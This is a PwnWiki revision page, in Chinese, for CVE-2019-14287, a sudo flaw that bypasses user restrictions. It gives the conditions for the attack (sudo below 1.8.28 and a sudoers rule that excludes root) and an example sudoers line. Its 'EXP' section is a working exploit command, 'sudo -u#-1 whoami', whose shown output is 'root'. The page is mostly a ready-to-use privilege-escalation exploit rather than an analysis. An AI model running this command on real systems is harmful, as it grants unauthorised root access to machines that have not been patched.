Difference between revisions of "CVE-2019-14287 Sudo權限繞過漏洞"
From PwnWiki
(Created page with "=== Info === [https://blog.aquasec.com/cve-2019-14287-sudo-linux-vulnerability CVE-2019-14287 sudo Vulnerability Allows Bypass of User Restrictions] ==== 利用要求 ====...") |
(→EXP) |
||
| Line 1: | Line 1: | ||
=== Info === | === Info === | ||
| − | |||
[https://blog.aquasec.com/cve-2019-14287-sudo-linux-vulnerability CVE-2019-14287 sudo Vulnerability Allows Bypass of User Restrictions] | [https://blog.aquasec.com/cve-2019-14287-sudo-linux-vulnerability CVE-2019-14287 sudo Vulnerability Allows Bypass of User Restrictions] | ||
| − | |||
==== 利用要求 ==== | ==== 利用要求 ==== | ||
| − | |||
<li>sudo版本低於v1.8.28</li> | <li>sudo版本低於v1.8.28</li> | ||
| − | |||
<li>/etc/sudoers 配置要求如下(要求一組特定權限,不一定完全是下面的樣子)</li> | <li>/etc/sudoers 配置要求如下(要求一組特定權限,不一定完全是下面的樣子)</li> | ||
| − | |||
==== 示例 ==== | ==== 示例 ==== | ||
<pre><user> ALL=(ALL:!root) NOPASSWD: ALL</pre> | <pre><user> ALL=(ALL:!root) NOPASSWD: ALL</pre> | ||
| − | |||
=== EXP === | === EXP === | ||
| − | |||
<pre> | <pre> | ||
| − | sudo -u# | + | sudo -u#-1 whoami |
root | root | ||
</pre> | </pre> | ||
Latest revision as of 15:10, 30 April 2021
Info
CVE-2019-14287 sudo Vulnerability Allows Bypass of User Restrictions
利用要求
示例
<user> ALL=(ALL:!root) NOPASSWD: ALL
EXP
sudo -u#-1 whoami root
